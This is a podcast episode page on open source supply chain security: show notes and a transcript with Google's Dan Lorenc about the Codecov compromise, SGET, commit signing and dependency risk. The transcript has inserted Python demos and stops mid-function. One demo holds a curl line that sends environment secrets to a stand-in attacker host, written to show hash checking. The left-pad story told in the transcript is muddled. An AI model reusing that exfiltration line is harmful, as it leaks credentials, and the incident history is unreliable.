Episode 20

Taking Open Source Supply Chain Security Seriously with Dan Lorenc


August 9th, 2021

34 mins 59 secs


About this Episode


Sponsored by Reblaze, creators of Curiefense

Panelists

Justin Dorfman | Richard Littauer

Guest

Dan Lorenc
Software Engineering Lead, Google

Show Notes

Hello and welcome to Committing to Cloud Native Podcast! It’s the podcast by Reblaze where we talk about the confluence of Cloud Native and Open Source. Today, we are very excited to have as our guest Dan Lorenc, who is a Staff Software Engineer and the lead for Google’s Open Source Security Team. He also founded projects like Minikube, Skaffold, TektonCD, and Sigstore. Dan takes us back to how he got into open source, Google, and Cloud, and how he ended up being a lead for Google’s Open Source Security Team. We learn more about one of the bigger attacks, which happened when the Codecov Bash Uploader got compromised, what SGET is, what Google is doing to stop dependency nightmares, zombie dependencies, and attack vectors, and why Dan thinks signing Git commits on GitHub does not add much value. Dan has written several blog posts and he talks more about some of them, and he shares some tips on the easiest way to get your security up if you are using cloud providers for working on open source projects. Download this episode now to find out much more from Dan!

[00:01:53] Dan tells us how he got into open source, Google, Cloud, and how he ended up being a lead for the Open Source Security Team. He tells us about his first open source project called Minikube.

[00:05:07] Justin brings up the safer curl URL pipe to bash which has been a topic on Hacker News. We learn more about the attack that happened earlier this year when Codecov bash installer got compromised and Dan explains more about that. Dan goes in-depth about what SGET is.

[00:11:04] Richard asks Dan if he thinks it’s important that people sign their Git commits and he talks about a blog post he wrote a couple of weeks ago about this.

[00:12:40] Dan explains how we can deal with security with stuff in the cloud and he tells us one of the biggest concerns he has right now.

[00:15:12] Find out more about the security leads across Google, and he tells us about an amazing paper that he recommends reading called “Reflections on Trusting Trust” by Ken Thompson.

[00:17:23] Some people at the PSF got a $300,000 grant for supply chain security and Justin asks Dan if he had a role in that. Also, Justin mentions the reports going to Congress and the powerful XKCD graphic.

[00:19:57] Learn what Google is doing to stop dependency nightmares, zombie dependencies, and vectors hitting that area. Also, Richard wonders if you can know as a cloud user what the dependencies actually are that you’re able to be exploited by.

[00:26:54] Richard wonders how Dan stays sane, and how does he decide what to work on next. Also, Dan wrote a blog post called, “Procrastination Driven Development” and he describes how this all works in his brain.

[00:31:07] One thing Justin wants to know is what repository or what package manager keeps Dan up at night. He wonders if there are any out there that need attention, or are they getting the attention that they need.

[00:33:30] Find out where you can follow Dan on the internet and also some great tips to get your security up if you are using cloud providers at the moment for working on open source projects.

Links

Curiefense

Curiefense Twitter

Curiefense Blog

Cloud Native Community Groups-Curiefense

community@curiefense.io

Reblaze

Justin Dorfman Twitter

jdorfman@curiefense.io

podcast@curiefense.io

Richard Littauer Twitter

Tzury Bar Yochay Twitter

Dan Lorenc Twitter

Dan Lorenc Website

“Codecov Bash Uploader Dev Tool Compromised in Supply Chain Hack” By Ryan Naraine (Security Week)

SGET

“Should You Sign Git Commits?” By Dan Lorenc

“Reflections on Trusting Trust” By Ken Thompson

“Securing Open Source Software at the Source” By Ashwin Ramaswami

“Zombie Dependencies” By Dan Lorenc

“The Dependency Jungle” By Dan Lorenc

“Procrastination Driven Development” By Dan Lorenc

“Open Source is Under Attack” By Dan Lorenc (YouTube)

Dependency - XKCD #2347



Transcript

[00:01] Dan Lorenc: Open source is starting to become a worry because attackers are starting to attack it. We've known about these attacks, and supply chain attacks in general, for decades, right? They go back to at least 1984, I think, when Ken Thompson published this amazing paper called "Reflections on Trusting Trust." He pranked a bunch of his coworkers at Bell Labs by putting a backdoor into a compiler. That backdoor was so smart that it would insert backdoors into everything it compiled. His coworkers were very smart though, so they knew how to disassemble these binaries and [00:27 inaudible], but his backdoor was so good that it also inserted a backdoor into all the disassembling tools. So it would hide the backdoors when his coworkers looked at it. So he really baffled everybody and kind of showed that unless you know the tools that built all of the tools that built the tools you built, all the way down, it's hard to build up trust in software at all.

[00:44] Richard: Hello and welcome to Committing to Cloud Native, the podcast where we talk about the confluence of cloud native and open source. Very excited to introduce our guest today. Before I introduce him, I want to make sure we get to the other panelists on this episode. I am, of course, Richard Littauer, the man without the plan. And then we have Justin Dorfman, the man with the Dorf. Justin, how you doing?

[01:08] Justin: I'm doing great. I'm really excited to talk to Dan.

[01:12] Richard: Me too, Dan, as Justin just said, is our guest. This is Dan Lorenc. He is calling today from Austin, Texas. Dan is a staff software engineer and the lead for Google's open source security team. He looks very secure where he is. I can see lots of, no he's just a normal guy in a t-shirt. So don't be overwhelmed by how awesome his title is. Dan, how are you doing today?

[01:36] Dan Lorenc: I'm having a great day. Thanks for having me on.

[01:38] Richard: Is it really hot in Austin right now? It's really hot everywhere else.

[01:41] Dan Lorenc: Yeah, it's pretty warm. It's not as hot as it can get here in the summer, so don't want to brag too much, but yeah, we're warm.

[01:48] Richard: Pretty good. Now you live in Austin, but you've been in the cloud space for eight years. Tell us how you got where you are. How did you get into open source and Google and cloud?

[01:58] Dan Lorenc: So I've been at Google for about nine years now, in the cloud space for pretty much the entire time, since before it was called cloud. My first job at Google was on the App Engine team, when that was kind of the only product Google had in the cloud area. If you're not familiar with it, it was a kind of platform-as-a-service product before any of those buzzwords existed. So cloud kind of popped up around it, and around me, as I was working on kind of this developer tooling, developer experience area. I got more into open source probably right around when Kubernetes and containers started to pick up. I started playing around with Docker pre-1.0, I remember all the old glory days there, and got into the Kubernetes ecosystem right when that started to take off. So it's been a fun ride since.

[02:38] Richard: So how do you end up being a lead for the open source security team? If you're first in a space, someone has to hire you or something, right? So like how did that happen?

[02:48] Dan Lorenc: Yeah. So in the open source, in the supply chain security area, it was a case of just kind of being really worried about it before anybody else was, I guess. And actually, yeah, that kind of connects back to how I got into open source. When I started at Google, I was doing some work on our cloud platform and stuff, but from the inside, and Google's got a pretty different development process than a lot of other companies. Everything's in a big monorepo, and you've probably heard some stories about that. When you step outside of that monorepo and start building things in open source, all the tooling disappears. You're not using these same internal build systems and everything. And it was kind of scary at first.

[03:20] My first open source project was Minikube. I started that project, I don't remember how many years ago now, but that was kind of the standard way to get Kubernetes set up on a laptop. And I was building it on my laptop, publishing this binary on GitHub just from my laptop, that people were just taking and running as root on their computers all over the world. And it was kind of terrifying compared to, you know, the internal stuff I was used to. And you're making that face now, but that's still how most people are doing development.

[03:43] Richard: When you say people. How many people are we talking?

[03:47] Dan Lorenc: Most of them, and it's scary. And so, yeah, I started to worry about that, looked around, and there were not a lot of better options in open source. So I've been worried about supply chain security there for a while, and got really serious about it maybe two or three years ago. And still it wasn't a big topic. Maybe about a year ago other people started to worry, the attacks started to pick up, people other than just me started to get scared, and I stopped looking like a crazy person with a sign by the side of the road saying the end is coming. And then, you know, SolarWinds and some of the other big attacks happened earlier this year. And now all of a sudden, you say, why haven't we cared about this for longer?

[04:20] Justin: Now you win. First they think you're crazy and now you win.

[04:25] Dan Lorenc: Yeah. If you're too crazy for long enough, eventually people will believe you. Is that the motto?

[04:29] Justin: Let me just tell Richard something. So Richard, I reached out to Dan and I'm like, hey, I really want you on the podcast, and he responds with, oh, here, talk to this person. No, I want you on the podcast, because I've looked at your background with Minikube and Skaffold and Sigstore. I was just blown away. I was like, I didn't realize you were involved with all of that. So the one thing that we've been seeing a lot, especially with security, is a safer curl URL pipe to bash. It's been a topic on Hacker News. It's always been a thing. So can you tell me and the rest of the world about SGET? Cause I just learned about it.

[05:13] Dan Lorenc: The curl pipe to bash thing, it's been a meme on Hacker News forever. People love to complain about it. There isn't really a lot better you can do in certain circumstances. I think it's also kind of misunderstood too. Some of the problems with it, it's not quite as bad as a lot of people say, but it is really bad in some other ways, I guess. And then I think there's some stuff we can do to improve it overall, or we can start, I guess. The curl pipe to bash, not meme, kind of pattern, if you're unfamiliar with it, is a way to install a piece of software. You go to a website and it says, here's a little script. This will install the software for you, just hit this with curl and then execute it on your system. And it will do some smart stuff and install our code.

[05:45] People love to do that as developers because it's pretty easy to set up. You set it up once, and you can have a bash script that's pretty smart. You don't have to worry about bundling for all 37 different Linux distributions, or for Macs, getting into Homebrew and ports and the Mac App Store, and Windows executables and all the different platforms and everything like that. You can kind of just write one bash script [06:02 exists]. The problem, though, is that there's not as much security there. There are kind of different security constraints when you're installing software that way. At least now, for the most part, people are doing curl of an HTTPS URL, pipe to bash. That wasn't always the case, you know, four or five years ago, before Let's Encrypt took off. And so that was really one of the biggest problems with doing that: you don't even know what script you're getting, or if somebody's kind of man-in-the-middling and modifying the script before it gets to you.

[06:26] But if you do have a script that's served from a pretty good website and there's SSL set up, curl pipe to bash isn't the worst thing in the world. What it is missing, though, is a lot of the benefits that package managers can give you, or a lot of the protections that package managers provide to the developers too, which is kind of one of the parts that's misconstrued a bit. When you apt-get install a piece of software on Debian, say curl for example, you're not taking curl from the curl maintainers' repo, you're not getting it from github.com/curl. You're getting a fork of curl, where the Debian maintainers have forked curl and they have promised to apply security patches in a timely manner for a set period of time. That's just how Debian works. The tradeoff there, though, is that they're going to be applying patches and they're not going to be taking new features in. It's really just security patches for that time, until there's a new Debian release. And then they will bump the version of curl to pick up all the new features and then apply patches again, going forward.

[07:18] So there's really no option in the middle for people today. You either get something maintained by a group of maintainers or you take it directly from upstream. If you get it directly from somebody upstream, then who knows how you're installing it and all that stuff. Upstream maintainers don't have signing keys. Tampering can happen even in the places where they publish stuff. So of the attacks that we've seen there, one of the big ones earlier this year was when Codecov's bash installer got compromised. Are you both familiar with that one?

[07:42] Richard: Our listeners may not be.

[07:43] Justin: Yeah, exactly. Go more into it.

[07:45] Dan Lorenc: Codecov is a popular code coverage tool, and they wanted to make it really easy to install this tool and scrape your code coverage metrics as part of CI, so you can track it over time. Just like Linux distributions, there are a hundred different CI systems out there. And so they packaged this installer up in a bash script, basically. You could curl this bash script. It would install a little reporter in your CI system. And that's all you had to do, it's really one line. So, awesome developer experience. And it's used all over the world. Unfortunately, they had some credential leak happen, which can happen to anybody. It probably does happen to tons of people. And somebody found those credentials and used them to tamper with the script that was served to users.

[08:21] And nobody noticed for months. They did some of the best practices they were supposed to do, like publishing hashes for this script and telling people how to verify them. But nobody was doing that, basically. The easy way was too easy, and people didn't follow the instructions for how to do it correctly. So it took months before anybody noticed this script, which was supposed to be uploading code coverage, was actually stealing all the secrets in your CI system and exporting them to some IP, and we still don't know exactly where they were going. So that was one case where the script was downloaded from the correct URL. They published hashes, people didn't check those hashes, and something in the middle got screwed up. So we thought, how could we make this a little bit easier? And one of the ideas is this new SGET tool, which I think you were just talking about, right, Justin?

[08:58] Justin: Correct?

[08:59] Dan Lorenc: Yes, so this is a tool we started as part of the Sigstore project to try to make the easy way to download stuff also the safe, secure way. So safe get or secure get or something like that is where the name came from. The problem that Codecov ran into, really, is that if you're going to distribute those hashes for the file you're downloading, you have to put them somewhere, and you can't put them right next to the binary or script you're distributing, because then whoever gets the credentials to change that script can just go and change those hashes. So they put them somewhere else, which is the right thing to do. They put them back on the GitHub repo, but that also means nobody's going to go check them, because it's something else you have to do. It's another URL you have to figure out and go learn.
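
As a rough illustration of the check Dan says nobody was doing, here is a minimal Python sketch of verifying a downloaded script against a SHA-256 digest published somewhere other than the download location. The script contents, the attacker URL, and the function names are all hypothetical; this is not how Codecov or SGET implement it.

```python
import hashlib
import hmac


def sha256_hex(data: bytes) -> str:
    """Return the SHA-256 digest of data as lowercase hex."""
    return hashlib.sha256(data).hexdigest()


def verify_script(script: bytes, published_digest: str) -> bool:
    """Check a downloaded script against a digest published somewhere else."""
    expected = published_digest.strip().lower()
    # compare_digest avoids leaking where the two strings first differ.
    return hmac.compare_digest(sha256_hex(script), expected)


# Hypothetical installer contents, and the digest its publisher would post
# in a separate location (for example, the project's source repository).
original = b"#!/bin/bash\necho 'uploading coverage report'\n"
published = sha256_hex(original)

# A tampered copy served from the download location (made-up attacker URL).
tampered = original + b"curl -s https://attacker.invalid/ -d \"$(env)\"\n"

print(verify_script(original, published))  # True
print(verify_script(tampered, published))  # False
```

The check only helps if the digest lives somewhere the attacker cannot also change, which is the point Dan makes about not storing hashes next to the script.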

[09:36] So the idea we came up with is to use OCI registries. If you're not familiar with the term OCI, it's the same thing as a Docker registry. OCI is the name of the protocol that Docker and everybody standardized on. Now the cool thing about an OCI registry is that you get a SHA-256 built into the URL directly. So it's a content-addressable API. When somebody uploads a script, you get a URL with the digest built right in, and all the tooling enforces that it's correct and all the servers enforce that it's correct automatically. So if you put a script there, rather than in a random S3 bucket or GCS bucket or something like that, it can't really be tampered with from the time you give somebody a link to that thing. So it makes the digest checking built-in and automatic and easy.
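
To make the content-addressable idea concrete, here is a toy Python sketch of a store whose addresses are derived from the bytes themselves. It is an in-memory stand-in under simplifying assumptions, not the OCI registry protocol; the class and method names are made up for illustration.

```python
import hashlib


class ContentAddressedStore:
    """Toy in-memory store whose keys are derived from the stored bytes."""

    def __init__(self):
        # Maps an address such as "sha256:<hex digest>" to the stored bytes.
        self._blobs = {}

    @staticmethod
    def address_of(data: bytes) -> str:
        """Compute the address for some bytes."""
        return "sha256:" + hashlib.sha256(data).hexdigest()

    def put(self, data: bytes) -> str:
        """Store data and return the address a publisher would hand out."""
        address = self.address_of(data)
        self._blobs[address] = data
        return address

    def get(self, address: str) -> bytes:
        """Fetch data, refusing to return bytes that do not match the address."""
        data = self._blobs[address]
        if self.address_of(data) != address:
            raise ValueError("content does not match " + address)
        return data


store = ContentAddressedStore()
link = store.put(b"#!/bin/bash\necho 'install'\n")
print(store.get(link) == b"#!/bin/bash\necho 'install'\n")  # True

# Simulate someone with write access swapping the stored bytes.
store._blobs[link] = b"#!/bin/bash\necho 'malicious'\n"
try:
    store.get(link)
    tamper_detected = False
except ValueError:
    tamper_detected = True
print(tamper_detected)  # True
```

Because the digest is part of the link, a client holding the original link notices any swap without having to look up a separate hash.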

[10:16] Richard: It's like SRI and it's like IPFS, right? It's like basically the same, like content addressable. How many people have to share that link before that's not like a vector, right? Cause if I share a link just with you, and then everyone in this podcast knows that it's me and you, then surely they could just come to our house with hammers and then they have the link.

[10:32] Dan Lorenc: Yeah. So, you know, you still have to get that link to people correctly the first time. And then there's some other stuff you can do there. But yeah, so if you're handing people a link, you get that SHA built in and you can check it. The SGET tool will do that. And there's some other cool stuff the SGET tool can do though, like help you with digital signatures, which are also pretty hard to do and are a pain today. If you do want to sign your contents with a physical key, I've got a bunch of YubiKeys here and there are [10:53 inaudible]. People can't see the video, but yeah, if you don't have a YubiKey, they're little thumb-drive-sized things you can plug into your computer, and they can keep some secret credentials on there that you can sign stuff with. And unless you lose that device, people can't really forge those signatures. So we've got integration for all of that built in too.

[11:08] Richard: Do you think it's important that people sign their commits?

[11:10] Dan Lorenc: I do not think signing commits on GitHub, and there's some subtlety here, I do not think signing commits on GitHub actually adds a ton of value.

[11:18] Richard: Why not?

[11:19] Dan Lorenc: I wrote a blog post a couple weeks ago about this. It's a similar issue to the one about publishing a digest for the content you're going to download right next to that file. On GitHub, when you sign a commit, the way signatures work in general is you have a private key and a public key, and you give everybody your public key, you sign stuff with the private one, and then they can check that signature against the public key. With GitHub you just have to log in with your password and you upload whatever public keys you want for your account. And if you sign a commit correctly, GitHub gives you [11:46 inaudible]. So if you're trying to protect against people compromising your password for your account by signing commits, it doesn't really do much, cause anybody that compromises your account can also just change the public key on there. And so you'll still get that green badge. So it's kind of protected by the same password that's protecting the account in the first place.

[12:03] Richard: But that's the same logic as Google protecting my password because anyone could just hack into Google and then my password isn't protected. So is that the argument you're making here?

[12:10] Dan Lorenc: [inaudible]  a signing doesn't do much on top of the password. So if you're trusting the password then signing is kind of a false sense of security I guess. There are ways you can make it more secure and get yourself some value, but that really comes down to using something else to distribute that public key on top of just github. You've got to come up with some other system, like you could tweet it, you could post it on Keybase, you could do a lot of these things. But for the most part, people just look at that little green badge on github and assume it's more secure when you get that little green icon saying it's verified, which is sort of the problematic aspect of it.

[12:41] Richard: Yeah. That makes a lot of sense to me. One of the questions I have that comes right off the bat is, we are on the Committing to Cloud Native podcast. So we're all about cloud native here. How do you deal with security with stuff in the cloud, when like tweeting your private keys doesn't make a ton of sense and then you're depending upon Amazon's ability to keep those keys sacred? What do I do, basically?

[13:03] Dan Lorenc: Yeah, there are a couple aspects to that, I guess. I think one of the biggest concerns, at least that I have right now in cloud native security, is Docker images in general. They're huge, there is tons of stuff in there. And for the most part, it's impossible to figure out what's in them. With our techniques, you know, you can start signing your images now. We've got a bunch of tooling and [13:21 inaudible] start to help with that. But even if you do that, you're just signing this big opaque blob, for the most part, that you're losing visibility into. So if you do a Docker build, you might have a curl pipe to bash inside of a Dockerfile, and nobody will know by the time you hand them that Docker image.

[13:37] There's a whole bunch of case studies that have been done. You know, these things go stale, you build an image it's immutable, which is great, but it's immutable, which means it never updates. And so you have to build a new one to update it. And then, so there's a whole bunch of problems that I think will be pretty easy to solve eventually, once we start taking it seriously, but aren't quite solved yet. If you look in your Kubernetes cluster, there's going to be hundreds, thousands of images in a big one. And in each of those, you're probably going to find 20 or 30 vulnerabilities when you start running them through scanners and they start to add up quickly.

[14:03] Richard: But it's your job to take things seriously early. So you're already taking it seriously. So I know you already have a fix for this. What is it?

[14:10] Dan Lorenc: It's kind of another philosophical change people have to start to make in the way they build software. You know, going back to that Minikube example I talked about earlier, I was building these Minikube binaries on my laptop and handing them to people. Eventually we graduated to building them in a build system that was just Jenkins, sitting on a Mac mini under my desk in the office. You wouldn't run production infrastructure on a bunch of Mac minis sitting under people's desks, but for some reason we're okay with building software on them and then putting that software right into our production environment. I think [14:37 inaudible] shifts we have to make, and we saw this with the SolarWinds attack in general, is that you need to start treating your build environment as seriously or more seriously than the production environment you're going to deploy into.

[14:47] You wouldn't go build a huge fence and then slap a cheap lock on the front of it. That doesn't really make any sense. But the build system really is the doorway into our production environment. So if that's not at least as secure as the environment that you're going to go put that stuff into, then it just becomes a natural attack point, and attackers are starting to figure that out.

[15:05] Richard: So not to go into vectors of attack for Google, but to totally go into vectors of attack for Google, you are the open source security lead. There's also probably a security lead and there's also probably a physical security lead. Do you three all meet up in like a dark room with cigars and figure out like what to do and where to put locks?

[15:26] Dan Lorenc: There are a lot of security leaders across Google. We take security pretty seriously. There are thousands of people that work on it. Open source has started to become a worry because attackers are starting to attack it. Open source now is under attack. We've known about these attacks, and supply chain attacks in general, for decades. They go back to at least 1984, I think, when Ken Thompson published this amazing paper called "Reflections on Trusting Trust." If you haven't read this or watched any videos about it, you should really look it up. It's amazing. He pranked a bunch of his coworkers at Bell Labs, basically, which was full of very smart people, by putting a backdoor into a compiler. That backdoor was so smart that it would insert backdoors into everything it compiled.

[16:04] His coworkers were very smart though, so they knew how to disassemble these binaries and [16:06 inaudible], but his backdoor was so good that it also inserted a backdoor into all the disassembling tools. So it would hide the backdoors when his coworkers looked at it. So he really baffled everybody and kind of showed that unless you know the tools that built all of the tools that built the tools you built, all the way down, it's hard to build up trust in software at all. But for some reason we forgot about it after the eighties, until the last couple of years. The best answer I've gotten to that one, I don't have a definitive answer. I haven't sat down all the attackers and asked them why they've only started inserting vulnerabilities into open source software in the last couple of years.

[16:35] Richard: Dude that sounds like you should do that. Why haven't you done that? Come on.

[16:39] Dan Lorenc: Let's get the next episode of the podcast. The best answer I've gotten is that we've finally gotten so good at locking down all the other ways in. Software security in general was terrible. You didn't need to go and hack the compiler to do these cool tricks. Even in the last decade, security has gotten so much better in general that these supply chain attacks, and using open source as a supply chain vector, haven't really become easier on their own. They've just become relatively easier because we're using password managers and two factor [17:03 auth] and HTTPS and all of these other things that we should have been doing this whole time. But now that we are doing those, the supply chain attacks are becoming relatively easier. And they're also more insidious in a lot of ways.

[17:15] Justin: After SolarWinds, it seems like all of a sudden your position is just like totally validated. With that said, we know some folks at the PSF who got that $300,000 grant for supply chain security. What was your role in that, if you had one, or how was it?

[17:36] Dan Lorenc: The PSF has actually gotten a couple of grants lately. One came from Google. I think they got another one from Bloomberg. A bunch of organizations are starting to take this seriously and fund this critical infrastructure. This one, I'm sure you've probably seen the XKCD. I can't remember the number now, but it's got this picture of all these crazy complex things built up, all modern digital infrastructure. And then it shows one person holding up one tiny corner of it. And it says one maintainer maintaining this [18:00 inaudible] in Nebraska by themselves for the last 20 years. I think the PSF runs some critical infrastructure for our industry, which is the Python Package Index, Warehouse, and all of that stuff.

[18:10] I think a lot of huge companies that take critical production dependencies on this don't realize how underfunded and understaffed a lot of these things are. And so we've been trying to find a lot of those across the industry that people are relying on without realizing it, and get them the visibility and the funding that they need to better maintain and secure and support this infrastructure. Those grants are also going to do some other cool stuff like, you know, integrating vulnerability scanning into the Python toolchains and making it easier to understand what your dependencies are across different requirements.txt files.

[18:40] Justin: I got to say I think probably the most prominent non code contribution to open source in the past fiscal year is that XKCD graphic with the Nebraska.

[18:53] Dan Lorenc: [Inaudible]

[18:54] Justin: Yeah Nebraska, like I'm seeing it in reports that are going to Congress, like it's out of this world. So we'll put it in the show notes, but it's just a powerful graphic.

[19:05] Richard: I just keep wondering who it is. I mean, I know the [19:07 crosstalk] lives in Kansas City, so [19:08 inaudible] is in Kansas City. That's the closest I can get to Nebraska, but who is a developer in Nebraska? There's gotta be one. There's gotta be one somewhere down the dependency chain. I want to find that person and thank them.

[19:19] Dan Lorenc: Reach out from Nebraska, wherever you are.

[19:22] Richard: So supply chain attacks are the equivalent of taking a couple of horses and a few pistols and hitting up a stagecoach as it goes between bank one to bank C across Nebraska, back in the old days, right? That's like, let's hit it here. In open source that kind of works by hitting the dependency tree, and dependencies are really complex things that are really easy to hack. Justin and I have interviewed Dominic Tarr before on our other podcast, Sustain, where we talk about these sorts of issues a lot. And he was the owner of left-pad, which had a whole thing happen to it. And that was when we realized, oh crap, what's going on with our dependencies. Dan, what is Google doing to stop dependency nightmares, zombie dependencies, vectors hitting that area?

[20:04] Dan Lorenc: So open source is a critical piece of most software supply chains today. Nobody's running software without open source coming in at some point. And so that's why we're starting to see it attacked: the combination of how widely used it is. You know, left-pad was a huge wake-up call there. How many different dependencies show up in your transitive tree? You might only install one in a Node application, but then that installs 10, and they each install 25, that each install another 30, and the combinatorics start to blow up. And so if you look at each one of those as a potential attack vector and attack point, you start to get pretty scared. I don't remember the exact left-pad story. I think it was just deleted. It wasn't actually attacked or something like that. It was deleted or untagged or yanked from NPM or something.
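
The fan-out Dan describes can be sketched in a few lines of Python. The dependency graph below is entirely hypothetical (only the left-pad name comes from the conversation); the sketch just walks the graph to show how one direct dependency can pull in several transitive ones.

```python
from collections import deque


def transitive_dependencies(graph: dict, root: str) -> set:
    """Return every package reachable from root, excluding root itself."""
    seen = set()
    queue = deque(graph.get(root, []))
    while queue:
        package = queue.popleft()
        if package in seen:
            continue
        seen.add(package)
        # Packages missing from the graph are treated as having no dependencies.
        queue.extend(graph.get(package, []))
    seen.discard(root)  # ignore cycles that point back at the root
    return seen


# Hypothetical dependency graph: package name -> direct dependencies.
graph = {
    "my-app": ["web-framework"],
    "web-framework": ["router", "logger", "left-pad"],
    "router": ["path-parser", "left-pad"],
    "logger": ["color-codes"],
    "path-parser": [],
    "color-codes": [],
    "left-pad": [],
}

direct = graph["my-app"]
transitive = transitive_dependencies(graph, "my-app")
print(len(direct), len(transitive))  # 1 6
```

Every name in the resulting set is a package whose maintainers and publishing credentials the application implicitly trusts.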

[20:43] Richard: Someone asked Dominic Tarr to be the maintainer. He's like, yeah, I don't need to maintain this thing, I live on a sailboat, I'm done, and gave it to him. And then that person then deleted it. And then everyone's like, crap, all of our builds broke.

[20:55] Dan Lorenc: Right, right. Yeah. So it wasn't attacked. There was no malware inserted, no Bitcoin mining, you know, it could have been much, much worse, but it was a big wake-up call to everybody that had something depending on that, that didn't know they were depending on that. So there have been some other scary studies showing that, you know, the transitive reach of some of these packages on NPM is huge. If you can get, like, and I'm kind of making up the stats here, I think it was in a Sonatype report, but if you can get the credentials for 10 people on NPM, then that's like 80% of all packages. The fan-out ratio is pretty huge. So it's pretty scary that way. What Google is trying to do is just come up with some best practices, visibility, and insights around that, so you can actually see how large a transitive dependency tree is.

[21:33] You know, we can't just magically go in and wave a wand and get every project to start reducing these things or cutting off their dependency tree or taking fewer dependencies or fixing all of the code. But it's a cultural shift again, just like the rest of it. And so a lot of it is around showing visibility, how important it is to know, and not just blindly adding things to your go.mod file or your package-lock.json. Just because somebody wrote a library, it doesn't mean it's going to be better for you in the long run than finding a smaller one, assuming it's a little bit more work for yourself. We're not the only ones in the industry working on this stuff. You know, Dependabot at GitHub has been a huge help to people, just to kind of automate and make that update process easier. Sending people smaller changes constantly is a way better tactic than only updating once a year and having to resolve dependency conflicts for the next three months. I mean, we're seeing huge projects like Kubernetes in the cloud native space actually start to actively go and reduce their dependency tree, which is awesome to see.

[22:26] Richard: So that's an interesting point about Kubernetes, because in the cloud what I'm often doing is having someone else run code where I don't actually see the dependencies. I just say, you go run this code. So can you even know, as a cloud user, what the dependencies actually are that you're able to be exploited by?

[22:42] Dan Lorenc: Not all of them, and that's a big part of it. If you're importing something directly, then maybe you can look in its dependency file and see everything all the way down. But if you're just grabbing a binary or using a SaaS product or something over the service, then no, you can't. And that's pretty scary in a lot of cases. The Kubernetes one is also, you know, there's kind of two sides to it. Kubernetes is this huge application with thousands of its own dependencies. People also import Kubernetes. Almost anything in the cloud native space reuses code from Kubernetes directly.

[23:10] And so by actively reducing their dependencies, Kubernetes is giving themselves a much better footprint and reducing their attack vectors. But it also unblocks everybody up and down the dependency tree so they can start to reduce these things too. And that's why this is so hard to kind of prevent and mitigate overall, right?

You're kind of at the mercy of your downstream dependencies, and you might not have merge rights, and maybe no one has merge rights anymore. We see this a lot with the zombie dependencies we were talking about.

[23:34] A project could be super well-maintained until it's not anymore, and somebody, you know, just moves on and deletes their GitHub, or leaves it there without responding to email and that kind of thing. It's impossible to detect those. Because, you know, a really good stable project doesn't get a lot of work, which is awesome. And those are the types of things you should depend on because they're not breaking constantly, but from the outside that looks exactly like a project that has 35 CVEs inside of it where the maintainer just stopped responding. So it's kind of hard to tease those apart in a lot of cases.

[24:01] Justin: I think you bring up a good point about Dependabot, because I get pings on just my personal repos, like my website for instance. And I update them because it's very simple to do that. And I think maybe another thing GitHub/Microsoft should be looking into, to prevent these zombie-type repos and dependencies, is that once the project gets to a certain size, whether it's downloads or stars or whatever, it has to have a successor or be converted into an organization. I think that would probably be the next step to combat this whole dependency hell security vulnerability. So I think, you know, some people at GitHub and Microsoft, I mean, you can make this happen.

[24:51] Dan Lorenc: Yeah. I hadn't actually heard that. I thought of it like two seconds before you said it, the way you led up to that sentence. I had never thought of the converting-it-into-an-organization idea before.

[25:01] Justin: I forgot who said it. I think it was Andrew from Libraries.io who suggested that, but I'm not sure. I just know they ran a study showing that most dependencies in the Ruby community (they just did Ruby because that's their world) had one to two maintainers under a personal account. So that's where they kind of got that idea. But sorry, I didn't mean to cut you off.

[25:25] Dan Lorenc: Yeah, that's a great idea. It's a subtle difference, and so if you've never played around with GitHub that much, you might not understand the meaning there, but a lot of these things start out under a personal GitHub repository, something like github.com/myusernames/myrepo. I mean, there are certain permissions you can set in a personal repo. Like you can have other maintainers, but there's still only one admin, and it's the person whose name that's under. When you convert something to an organization, you usually give it a different name, but the overall pattern looks the same. So it's github.com/some-organization, which could look like your username or not, and then that repo. And the organization can have multiple admins that are all kind of equal. And if one steps down, somebody else can kind of, you know, they're also now an admin, and you can add other people and configure billing and do all of that cool stuff. So it's a really easy way to increase the bus factor, I guess, for a lot of these [26:10 stripped] the direction that one goes.

[26:13] Richard: Having worked in a lot of organizations, I wish that were true. But most of the time the lack of clarity in the actual organization itself can lead to that being more of a bus factor, not less. I know there are projects working on this, like ClearlyDefined. ClearlyDefined has been funded by Google as well as, like, AWS. And they're trying to basically build a giant database of all dependencies that are, like, legal or not, using SPDX licenses. I don't know if they're already doing stuff like security. They say they are on the website. I forget whether or not they have, say, a list of this many maintainers and this many vulnerabilities. At some point that would be a thing that's going to have to be done at scale, which just takes a lot of effort.

I have kind of a different question, if you don't mind, which is: this is all horrifying. This is really scary. I'm scared, right? Like everything is going to break. Everything probably broke yesterday. I just don't know it yet. How do you stay sane? Because it sounds like if everything is an order of magnitude as an issue, how do you decide what to work on next? And I know you've written a blog post called Procrastination Driven Development, so this was a bit of a leading question, but I'm just curious. Can you describe how that works in your brain?

[27:25] Dan Lorenc: Yeah. I mean, it's a great time to be in this field. There are so many problems, you know, all of it is impactful, but a lot of people get frustrated or turned away and they say, you know, there's no magic bullet here. There's not one thing we can do that's going to fix it all. But that means there's a hundred things that we have to go do, and we've got to do them all. And so there's plenty of room, plenty of opportunity for people to help out and get involved. I think one of the biggest areas is, like you talked about, having data and visibility and knowing where all of these dependencies are coming from. That's kind of where I'm focusing most of my time now, on the Sigstore project, because I think that's kind of a prereq for a lot of the other analysis that we can start doing.

[27:57] With supply chains right now, you have one whether you know it or not. Your code is coming from somewhere, that code is coming from somewhere, but you probably can't write it down today. Like if I asked you, what are all of your dependencies, you might be able to write those down. And if I say, what are all of those dependencies' dependencies? You probably can't write those down. You know, getting that transitive tree out there. There's another problem though, which is that even if you can start to write those down, especially in the Docker and cloud native world, you might think this container came from that container, which was built in this system, which came from this GitHub repo.

[28:24] But none of that is verifiable today. All of that metadata is, you know, it's just best effort. You're guessing that a Docker image is built from the repo that the person said they built it from and pushed it from. And so what we're trying to focus on there is verifiable supply chain metadata, but it doesn't mean it's good or bad. We're not telling you the repo is safe and that the maintainer isn't putting malware and, you know, Bitcoin miners in it.

What we're trying to do is build up a supply chain of metadata that we can trust. And prove that if something came from this repo, it actually did come from that repo. The repo might still have malware in it. That's a separate problem. It might still have a whole bunch of known vulnerabilities, but at least we know it came from that repo.
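
The distinction Dan draws, between proving where something came from and proving it is safe, can be illustrated with a much simpler stand-in: comparing an artifact's SHA-256 digest against a digest recorded at build time. This is only a sketch under stated assumptions. It is not how Sigstore works (real tooling relies on cryptographic signatures rather than a bare digest comparison), and the names `sha256_digest` and `matches_recorded_digest` are hypothetical.

```python
import hashlib
import hmac


def sha256_digest(data: bytes) -> str:
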